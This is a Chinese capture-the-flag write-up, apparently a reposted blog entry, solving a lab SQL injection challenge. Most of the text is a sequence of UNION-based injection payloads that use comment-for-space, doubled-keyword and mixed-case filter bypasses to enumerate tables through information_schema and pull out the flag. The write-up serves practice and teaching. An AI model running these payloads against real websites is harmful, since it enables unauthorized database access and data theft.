zoukankan      html  css  js  c++  java
  • 实验室每日一题WP-11月29日

    打开题目,直接受到物理攻击。看到网页左下角提示

     

     于是尝试sql注入,/?id=1;得到回显,/?id=1' ;无回显,判断为数字型注入。

    当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
    当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

     

    尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

    ?id=1/**/oorderrder/**/by/**/1得到回显

    测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

    ?id=1/**/Union/**/Select/**/1,2,3

    发现2,3为回显位,于是查询当前数据库名。

    ?id=1/**/Union/**/Select/**/1,2,database()

    得到数据库名 text

    查询表名

    ?id=1/**/Union/**/Select/**/1,2,group_concat(table_name)/**/frfromom/**/information_schema.tables/**/where/**/table_schema='text'

    得到flag,users

    获取列名

    ?id=1/**/uNion/**/Select/**/1,2,group_concat(column_name)/**/frfromom/**/information_schema.columns/**/where/**/table_name=%27flag%27

    id,flag

    查询字段值

    ?id=1/**/uNion/**/Select/**/1,2,flag/**/frfromom/**/flag

     得到flag

     

     flag{You have successfully!!!}

     

    下次可以尝试直接爆破数据库密码了

     

     

     

  • 相关阅读:
    9
    8
    7
    lua开发和调试环境
    MeshFilter mesh vs sharedMesh
    几种方法验证unity是否为development build
    Unity SetActive Event
    利用Data Vault对数据仓库进行建模(二)
    程序员如何圆飞行梦想(一)
    利用Data vault对数据仓库建模
  • 原文地址:https://www.cnblogs.com/riddler/p/14056052.html
Copyright © 2011-2022 走看看